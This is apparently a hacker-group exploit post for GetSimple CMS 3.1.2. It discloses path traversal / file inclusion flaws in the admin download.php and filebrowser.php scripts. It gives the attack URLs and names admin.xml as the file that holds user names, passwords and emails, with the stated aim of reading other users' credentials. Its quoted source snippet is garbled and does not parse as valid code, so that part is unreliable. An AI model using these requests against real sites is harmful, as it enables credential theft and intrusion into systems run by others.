===========================================================================
Author: PuN!Sh3r
Vulnerable Software: GetSimple CMS v 3.1.2
Official Site: http://get-simple.info/download/
===========================================================================

Hi to All..
We have Path Disclosure Vulnerability...
You can access other user creditinials..Because it uses .xml(Not mysql. And the user files in here /data/users/ . For example /data/users/admin.xml .It contains username,passwd,mail, etc.)
http://localhost/cms/admin/download.php?file=[LFI]

If you want to check it :

http://localhost/cms/admin/download.php?file=download.php
------------------------------------------------------------
http://i062.radikal.ru/1208/b4/c0587b1841e5.jpg
------------------------------------------------------------

2. http://localhost/cms/admin/filebrowser.php?path=[LFI]

snippet:

$filenames = getfiles ($path); 
$path = tsl ($path); 
$path = "../data/uploads/" . $_GET['path'] : "../data/uploads/"; 


Respect to All Azerbaijani BlackHatzzzz and Anti-armenia.org&Anti-armenia Team

Thank you!

./PuN!Sh3r
Â Â Â Â Â Â Â Â Â Â Â  Â